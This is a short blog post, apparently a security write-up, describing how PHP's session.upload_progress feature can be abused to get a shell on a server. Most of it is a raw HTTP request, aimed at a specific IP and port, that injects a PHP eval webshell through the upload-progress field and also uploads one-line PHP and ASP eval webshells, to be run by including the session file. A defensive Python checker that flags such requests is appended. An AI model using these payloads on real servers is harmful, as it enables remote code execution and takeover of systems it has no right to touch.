session.upload getshell

Author: Err0rzz | Published 2019-06-06 14:30
    session.upload_progress.enabled
    

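    This parameter is enabled by default and has to be turned off manually.
    If it is not turned off, an upload-progress file is generated automatically whenever a file is uploaded. Its path and file name can be found in phpinfo, in the following format: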

    /var/lib/php5/sess_{your_php_session_id}
    

    At this point it is enough to send a POST request like the following over and over (from @berTrAM):

    POST / HTTP/1.1
    Host: 47.52.246.175:23333
    Proxy-Connection: keep-alive
    Content-Length: 648
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2rwkUEtFdqhGMHqV
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=5uu8r952rejihbg033m5mckb17
    
    ------WebKitFormBoundary2rwkUEtFdqhGMHqV
    Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
    
    <?=`echo '<?php eval($_REQUEST[bertram])?>'>bertram.php`?>
    ------WebKitFormBoundary2rwkUEtFdqhGMHqV
    Content-Disposition: form-data; name="file2"; filename="1.php"
    Content-Type: text/php
    
    <?php eval($_POST[1]);?>
    
    ------WebKitFormBoundary2rwkUEtFdqhGMHqV
    Content-Disposition: form-data; name="file1"; filename="2.asp"
    Content-Type: application/octet-stream
    
    < %eval request("a")%>
    
    ------WebKitFormBoundary2rwkUEtFdqhGMHqV
    Content-Disposition: form-data; name="submit"
    
    Submit
    ------WebKitFormBoundary2rwkUEtFdqhGMHqV--
    

    The malicious trojan file is then refreshed continuously at

    /var/lib/php5/sess_{your_php_session_id}


    and including that file afterwards gets a shell.
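
A request-side check for the packet described above, as an added example that is not part of the original post: it parses a multipart/form-data body and flags a `PHP_SESSION_UPLOAD_PROGRESS` field that carries a PHP open tag. The function names, the boundary, the sample values and the plain-identifier policy are constructed assumptions.

```python
import re
from email import message_from_bytes

# Default session.upload_progress.name; change it if php.ini overrides the name.
PROGRESS_FIELD = "PHP_SESSION_UPLOAD_PROGRESS"
PHP_OPEN_TAG = re.compile(rb"<\?")                 # matches "<?php", "<?=" and short "<?"
PLAIN_ID = re.compile(rb"[A-Za-z0-9_.-]{1,64}")    # assumed site policy for legitimate values

def inspect_upload(content_type: str, body: bytes) -> list:
    """Return findings for one multipart/form-data request body."""
    # Prepend the Content-Type header so the stdlib MIME parser can split the parts.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    findings = []
    for part in message_from_bytes(raw).walk():
        name = part.get_param("name", header="content-disposition")
        if name != PROGRESS_FIELD or part.is_multipart():
            continue
        value = (part.get_payload(decode=True) or b"").strip()
        if PHP_OPEN_TAG.search(value):
            findings.append("PHP open tag in upload-progress field")
        elif not PLAIN_ID.fullmatch(value):
            findings.append("upload-progress field is not a plain identifier")
    return findings

def build_body(boundary: str, progress_value: bytes) -> bytes:
    """Build a constructed two-part form body used as sample input."""
    b = boundary.encode("ascii")
    return (b"--" + b + b"\r\n"
            b'Content-Disposition: form-data; name="' + PROGRESS_FIELD.encode() + b'"\r\n\r\n'
            + progress_value + b"\r\n"
            b"--" + b + b"\r\n"
            b'Content-Disposition: form-data; name="file1"; filename="a.txt"\r\n'
            b"Content-Type: text/plain\r\n\r\nhello\r\n"
            b"--" + b + b"--\r\n")

BOUNDARY = "----ConstructedBoundary01"             # constructed sample value
CTYPE = "multipart/form-data; boundary=" + BOUNDARY

if __name__ == "__main__":
    # Constructed inputs: one ordinary progress id, one inert PHP-tagged marker.
    for value in (b"upload-42", b"<?php /* inert constructed marker */ ?>"):
        print(value, "->", inspect_upload(CTYPE, build_body(BOUNDARY, value)))
```
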

    https://xz.aliyun.com/t/2148
    https://php.net/manual/zh/session.upload-progress.php
